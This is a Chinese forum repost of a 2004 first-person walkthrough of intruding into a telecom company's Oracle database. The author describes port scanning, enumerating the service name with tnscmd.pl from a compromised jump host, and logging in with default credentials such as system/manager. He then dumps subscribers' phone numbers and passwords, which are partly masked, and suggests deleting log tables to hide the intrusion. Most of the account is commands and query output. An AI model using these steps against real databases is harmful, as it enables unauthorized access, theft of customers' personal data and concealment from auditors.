首页 电脑 电脑学堂 查看内容

我是这样攻破某电信网站从而拿到手机用户的各类信息的

2004-9-29 20:05 876 0

摘要: 我是这样攻破某电信网站从而拿到手机用户的各类信息的准备工具-----代理猎手superscantnscmd.pl程序" target=_blank>http://www.xfocus.net/othe...
关键词: nbsp ORACLE xxxxxxx 机子 数据库 VARCHAR ABC 用户 NAME HANDLER

我是这样攻破某电信网站从而拿到手机用户的各类信息的准备工具-----代理猎手superscantnscmd.pl程序" target=_blank>http://www.xfocus.net/other/ztwz/tnscmd>;;CRT先用代理猎手扫ORACLE的通讯端口1521.扫到机子之后再用superscan扫这些ORACLE机子的80端口.这是为了更好地找到网站嘛,嘿嘿,过程就不罗嗦了,略去...当然要远程与ORACLE数据库相连,你得装ORACLE客户端,一般可通过sqlplus工具来连.最好找到一台装了ORACLE的肉机来上了,安全第一嘛. 一般要入侵ORACLE数据库,首先要知道它的网络服务名或SID和临听端口,这是比较关键的!所以我在开始说的那个tnscmd.pl程序,它可以探测到远程ORACLE数据库的网络服务名及端口哦,成功率达98%以上.还可探测到ORALCE机子的版本,可初步判断是什么操作系统等.接着就是要知道数据库用户名和密码.一般安装完ORACLE数据库后,系统就会有一些默认的用户名和密码,比如用户system的密码就默认为manager,其它如mdsys,ctxsys(ctxsys)....很多,随着版本不同,默认的用户多少就不一样了,有空看书去吧.好,下面以某某电信网站为例看看,LET'GO!....telnet x.x.x.x --------------->>我的一台UNIX肉机....sh-2.04# perl tnscmd.pl services -h 218.X.X.X -p 1521 --indent ----------->>218.X.X.X是要探测它的网络服务名的ORACLE机子sending (CONNECT_DATA=(COMMAND=services)) to 218.X.X.X:1521writing 91 bytesreading._.......6.........?. ..........DESCRIPTION=TMP=VSNNUM=135290880ERR=0SERVICES_EXIST=1..........SERVICE=SERVICE_NAME=PLSExtProcINSTANCE=INSTANCE_NAME=PLSExtProcNUM=1INSTANCE_CLASS=ORACLEHANDLER=HANDLER_DISPLAY=DEDICATED SERVERSTA=readyHANDLER_INFO=LOCAL SERVERHANDLER_MAXLOAD=0HANDLER_LOAD=0ESTABLISHED=0REFUSED=0HANDLER_ID=3E9E6F0B70BD-4065-AB7A-EFD1EA85FCD1HANDLER_NAME=DEDICATEDADDRESS=PROTOCOL=beqPROGRAM=extprocENVS=ARGV0=extprocPLSExtProcARGS='LOCAL=NO'NUMREL=1,,SERVICE=SERVICE_NAME=ABC ------------------------->>看到没有?有个服务名为ABC,上面的PLSExtProc应该是系统默认的,没用.INSTANCE=INSTANCE_NAME=ABCNUM=1INSTANCE_CLASS=ORACLEHANDLER=HANDLER_DISPLAY=DEDICATED SERVERSTA=readyHANDLER_INFO=LOCAL SERVERHANDLER_MAXLOAD=0HANDLER_LOAD=0ESTABLISHED=7REFUSED=4HANDLER_ID=49482E0B81C8-498C-AAC8-4CBF36FF1A9CHANDLER_NAME=DEDICATEDADDRESS=PROTOCOL=beqPROGRAM=oracleENVS=ARGV0=oracleABCARGS='LOCAL=NO.....,,[email protected]#好,我们已经知道服务名为ABC了.下面我们就试着通过sqlplus工具来远程连上它吧.例子过程如下:sh-2.04#sqlplus system/manager ---------------->>可以不用输入任何用户名和密码,可用sqlplus /nolog来替代.这是跳板.....SQL>connect system/manager@(description=(address_list=(address=(protocol=tcp)(host=218.x.x.x)(port=1521)))(connect_data=(SERVICE_NAME=ABC)));-------------->>这是要远程与那台ORACLE机子相连,你可以先在本地的tnsnames.ora文件里配置好,然后直接用connect system/manager@ABC方式来连,就不用输入这么长的连接字符串了.....(如果密码正确,那么就会提示connect on.如果不行,再换别的默认用户名和密码.当然有可能已经被锁住了.一般用dbsnmp/dbsnmp都能进去,但权限很低.可找ORACLE远程溢出相关方法来提升权限,但我没有成功过。 实在不行,换!!!)...成功进入后,SQL>select distinct owner from all_objects;--------------->这是查看数据库里面有多少用户(包括系统默认和新建的),方法很多,ORACLE与MSSQL很不一样,最好去找本书看吧.我个人觉得ORACLE所谓的用户就相当于MSSQL的数据库。所以我这里就是要找出这台ORACLE机子有哪些是新建的用户数据库,找的就是它。CTXSYSMDSYSDEMOPUBLICSYSSYSTEMABC...SQL>select owner,table_name from dba_tables where owner='ABC';------------>>这是找出用户ABC数据库所包含的表信息OWNER TABLE_NAME------------------------------ ------------------------------ABC MLOG$_T1ABC PLAN_TABLEABC RPTADABC RPTADMINABC RPTBUSIABC RPTFIRMABC RPTFIRMDETAILABC RPTGROUPABC RPTLOGABC RPTSUR...... ...... ABC TBUNITTYPEABC TBUSER....SQL> desc ABC.TBUSER;----------->>我找到这个比较可疑的表TBUSER,查看它表结构是怎么样.因为它属于ABC用户的,所以应写成ABC.TBUSER的样子.Name Null? Type----------------------------------------- -------- ----------------------------SEQNO NOT NULL NUMBERPHONENO NOT NULL VARCHAR2(16)GOTUINFO NUMBER(38)UNAME VARCHAR2(32)PASSWORD VARCHAR2(20)IDTYPE VARCHAR2(2)IDNUM VARCHAR2(20)OCCUPATION VARCHAR2(2)BIRTHDAY DATEUSTATE NUMBER(38)SERVICEDATE DATEREGDATE DATECANCELDATE DATEREGWAY VARCHAR2(2)CANCELWAY VARCHAR2(2)FIXEDPHONE VARCHAR2(16).....SQL> select PHONENO,PASSWORD from ABC.TBUSER;----------->>因为这台ORACLE机子是某某电信公司的网站嘛,所以对PHONENO这样的字眼我们有理由感到兴奋!!!.....PHONENO PASSWORD---------------- --------------------139xxxxxxxx 780929138xxxxxxxx 546789135xxxxxxxx 794951138xxxxxxxx 357954138xxxxxxxx 4905701380xxxxxxx 1613461382xxxxxxx 9402161391xxxxxxx 2034431391xxxxxxx 5826131391xxxxxxx 6807941382xxxxxxx 110218PHONENO PASSWORD---------------- --------------------1380xxxxxxx 6430591380xxxxxxx 7248111380xxxxxxx 1905531380xxxxxxx 2775141380xxxxxxx 205151139162xxxxx 411422.......这时候想干啥都行,可以给自己的手机号加钱,网上发短消息不用花钱等等, 嘿嘿,咱可不敢,那不死得更快吗?....好了,已经到这步了,待的时间不要太长,快闪!!!当然你可以找ORACLE的日志表,删或修改都行,只要权限足!具体什么表我忘了,找本书再看看先!SQL> quit以上就是全过程,简单.很多ORACLE的机子都可以这样搞搞,因为数据库这东西很少有哪个单位时时刻刻在订着,对于它的安全也关注少一点。但不要搞出事情来哦!被抓,被罚钱,被学校开除都不值得!还是不要拿国内的机子来试,不要学得太坏.打字好累啊,又想起阿Q的名言了:吴妈,我想XXX困觉!我真的想回去睡觉了,拜拜!各位兄台,晚安!
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部